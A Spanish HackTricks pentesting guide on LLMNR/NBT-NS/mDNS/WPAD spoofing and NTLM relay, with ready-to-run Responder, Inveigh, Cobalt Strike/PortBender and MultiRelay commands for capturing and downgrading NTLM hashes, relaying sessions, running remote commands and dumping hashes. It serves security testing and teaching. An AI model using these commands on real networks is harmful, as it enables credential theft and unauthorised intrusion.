hacktricks/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md

# Suplantación en LLMNR, NBT-NS, mDNS/DNS y WPAD y Ataques de Relevo

<details>

<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén la [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Protocolos de Red

### Protocolos de Resolución de Host Local
- **LLMNR, NBT-NS y mDNS**:
- Microsoft y otros sistemas operativos utilizan LLMNR y NBT-NS para la resolución de nombres locales cuando falla el DNS. De manera similar, los sistemas de Apple y Linux utilizan mDNS.
- Estos protocolos son susceptibles a la interceptación y suplantación debido a su naturaleza de difusión no autenticada sobre UDP.
- [Responder](https://github.com/lgandx/Responder) se puede utilizar para suplantar servicios enviando respuestas falsificadas a hosts que consultan estos protocolos.
- Se puede encontrar más información sobre la suplantación de servicios utilizando Responder [aquí](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### Protocolo de Descubrimiento Automático de Proxy Web (WPAD)
- WPAD permite a los navegadores descubrir la configuración de proxy automáticamente.
- El descubrimiento se facilita a través de DHCP, DNS, o en caso de fallo de DNS, mediante LLMNR y NBT-NS.
- Responder puede automatizar ataques WPAD, dirigiendo a los clientes a servidores WPAD maliciosos.

### Responder para Envenenamiento de Protocolos
- **Responder** es una herramienta utilizada para envenenar consultas LLMNR, NBT-NS y mDNS, respondiendo selectivamente según los tipos de consulta, apuntando principalmente a servicios SMB.
- Viene preinstalado en Kali Linux, configurable en `/etc/responder/Responder.conf`.
- Responder muestra las hashes capturadas en la pantalla y las guarda en el directorio `/usr/share/responder/logs`.
- Es compatible con IPv4 e IPv6.
- La versión de Windows de Responder está disponible [aquí](https://github.com/lgandx/Responder-Windows).

#### Ejecución de Responder
- Para ejecutar Responder con la configuración predeterminada: `responder -I <Interfaz>`
- Para sondeos más agresivos (con posibles efectos secundarios): `responder -I <Interfaz> -P -r -v`
- Técnicas para capturar desafíos/respuestas NTLMv1 para una descifrado más fácil: `responder -I <Interfaz> --lm --disable-ess`
- La suplantación de WPAD se puede activar con: `responder -I <Interfaz> --wpad`
- Las solicitudes de NetBIOS se pueden resolver a la IP del atacante, y se puede configurar un proxy de autenticación: `responder.py -I <interfaz> -Pv`

### Envenenamiento DHCP con Responder
- La suplantación de respuestas DHCP puede envenenar permanentemente la información de enrutamiento de una víctima, ofreciendo una alternativa más sigilosa al envenenamiento ARP.
- Requiere un conocimiento preciso de la configuración de red del objetivo.
- Para ejecutar el ataque: `./Responder.py -I eth0 -Pdv`
- Este método puede capturar eficazmente hashes NTLMv1/2, pero requiere un manejo cuidadoso para evitar interrupciones en la red.

### Captura de Credenciales con Responder
- Responder suplantará servicios utilizando los protocolos mencionados anteriormente, capturando credenciales (generalmente Desafío/Respuesta NTLMv2) cuando un usuario intente autenticarse contra los servicios falsificados.
- Se pueden realizar intentos para degradar a NetNTLMv1 o deshabilitar ESS para facilitar el descifrado de credenciales.

Es crucial tener en cuenta que el uso de estas técnicas debe realizarse de manera legal y ética, asegurando la autorización adecuada y evitando la interrupción o el acceso no autorizado.

## Inveigh

Inveigh es una herramienta para pentesters y equipos de red, diseñada para sistemas Windows. Ofrece funcionalidades similares a Responder, realizando suplantaciones y ataques de intermediario. La herramienta ha evolucionado desde un script de PowerShell a un binario de C#, con [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) y [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) como las principales versiones. Se pueden encontrar parámetros detallados e instrucciones en la [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).

Inveigh se puede operar a través de PowerShell:
```powershell
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```
O ejecutado como un binario de C#:
```bash
Inveigh.exe
```
### Ataque de Relevo NTLM

Este ataque aprovecha sesiones de autenticación SMB para acceder a una máquina objetivo, otorgando un shell del sistema si tiene éxito. Los requisitos clave incluyen:
- El usuario autenticado debe tener acceso de Administrador Local en el host de retransmisión.
- La firma SMB debe estar deshabilitada.

#### Reenvío y Tunelización del Puerto 445

En escenarios donde la introducción directa a la red no es factible, el tráfico en el puerto 445 debe ser reenviado y tunelizado. Herramientas como [**PortBender**](https://github.com/praetorian-inc/PortBender) ayudan a redirigir el tráfico del puerto 445 a otro puerto, lo cual es esencial cuando se dispone de acceso de administrador local para la carga de controladores.

Configuración y operación de PortBender en Cobalt Strike:
```bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
### Otras Herramientas para Ataques de Relevo NTLM

- **Metasploit**: Configurado con proxies, detalles del host local y remoto.
- **smbrelayx**: Un script de Python para relé de sesiones SMB y ejecutar comandos o desplegar puertas traseras.
- **MultiRelay**: Una herramienta de la suite Responder para relé de usuarios específicos o todos los usuarios, ejecutar comandos o volcar hashes.

Cada herramienta se puede configurar para operar a través de un proxy SOCKS si es necesario, permitiendo ataques incluso con acceso de red indirecto.

### Operación de MultiRelay

MultiRelay se ejecuta desde el directorio _**/usr/share/responder/tools**_, apuntando a IPs o usuarios específicos.
```bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic
```
Estas herramientas y técnicas forman un conjunto completo para llevar a cabo ataques de retransmisión NTLM en diversos entornos de red.

### Forzar Inicios de Sesión NTLM

En Windows **puede ser posible forzar a algunas cuentas privilegiadas a autenticarse en máquinas arbitrarias**. Lee la siguiente página para aprender cómo:

{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
{% endcontent-ref %}

## Referencias
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)


<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>